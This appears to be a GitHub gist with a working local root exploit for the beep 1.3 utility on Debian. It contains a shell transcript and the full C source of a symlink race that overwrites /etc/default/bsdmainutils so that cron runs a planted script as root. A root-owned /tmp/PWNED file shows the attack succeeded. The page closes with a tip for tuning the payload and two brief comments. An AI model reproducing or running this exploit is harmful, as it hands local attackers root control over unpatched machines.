beepbob - thanks @_tsuro!!!!
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| fkt@debian:~$ uname -a | |
| Linux debian 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64 GNU/Linux | |
| fkt@debian:~$ # wget http://snapshot.debian.org/archive/debian/20160117T220543Z/pool/main/b/beep/beep_1.3-4_amd64.deb | |
| fkt@debian:~$ /usr/bin/beep -v | |
| beep-1.3 | |
| fkt@debian:~$ gcc -O2 race.c -o race | |
| fkt@debian:~$ echo "touch /tmp/PWNED" > $(python -c 'print "/tmp/x\x12\x02g",') | |
| fkt@debian:~$ chmod +x /tmp/x* | |
| fkt@debian:~$ ./race 1000 3000 200 | |
| 2011 1000 | |
| [DEBUG] 1 times 1 ms beeps (100 delay between, 0 delay after) @ 440.00 Hz | |
| 2012 1000 | |
| [DEBUG] 1 times 1 ms beeps (100 delay between, 0 delay after) @ 440.00 Hz | |
| [DEBUG] 1 times 2016356980 ms beeps (2 delay between, 0 delay after) @ 65.00 Hz | |
| WON!! | |
| # if u do not want to wait | |
| fkt@debian:~$ cd / && sudo run-parts /etc/cron.daily | |
| fkt@debian:~$ ls -la /tmp/PWNED | |
| -rw-r--r-- 1 root root 0 Apr 5 06:14 /tmp/PWNED |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <unistd.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <sys/types.h> | |
| #include <sys/wait.h> | |
| #include <sys/stat.h> | |
| #include <signal.h> | |
| #include <string.h> | |
| #include <errno.h> | |
| void handle_signal(int signum) { | |
| switch(signum) { | |
| case SIGINT: | |
| case SIGTERM: | |
| wait(NULL); | |
| exit(signum); | |
| } | |
| } | |
| int main(int argc, char **argv) | |
| { | |
| FILE *fp; | |
| char buf[10]; | |
| char *l = "b"; | |
| int b = atoi(argv[1]); | |
| int e = atoi(argv[2]); | |
| int t = atoi(argv[3]); | |
| int del = b; | |
| char *args[] = { "/usr/bin/beep", "--debug", "-e", l, "-l", "1", "-n", "-d", "2", "-f", "65", "-l", "2016356980", NULL }; | |
| signal(SIGINT, handle_signal); | |
| signal(SIGTERM, handle_signal); | |
| while (1) { | |
| int pid = fork(); | |
| if ( pid == 0 ) { // child | |
| unlink(l); | |
| symlink("/dev/input/event0", l); | |
| execv(args[0], args); | |
| } else { // parent | |
| usleep(del); | |
| unlink(l); | |
| symlink("/etc/default/bsdmainutils", l); | |
| kill(pid, SIGTERM); | |
| usleep(t); | |
| kill(pid, SIGKILL); | |
| waitpid(pid, NULL, 0); | |
| fp = fopen("/etc/default/bsdmainutils", "r"); | |
| fscanf(fp, "%4s", buf); | |
| if(!strcmp(buf, "t*/x")) { | |
| printf("WON!!\n"); | |
| exit(0); | |
| } | |
| fclose(fp); | |
| } | |
| del++; | |
| printf("%d %d\n", del, b); fflush(stdout); | |
| if (del > e) { | |
| printf("%d %d\n", del, b); fflush(stdout); | |
| del = b; | |
| usleep(1000*1000); | |
| } | |
| } | |
| return 0; | |
| } |
Use '*/@ ' or something instead of 't*/x' to avoid fiddling with the \x12\x02g garbage for even more fun! (suggested by @edgarboda)
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
I see what you did there
And it seems like my analysis was actually correct...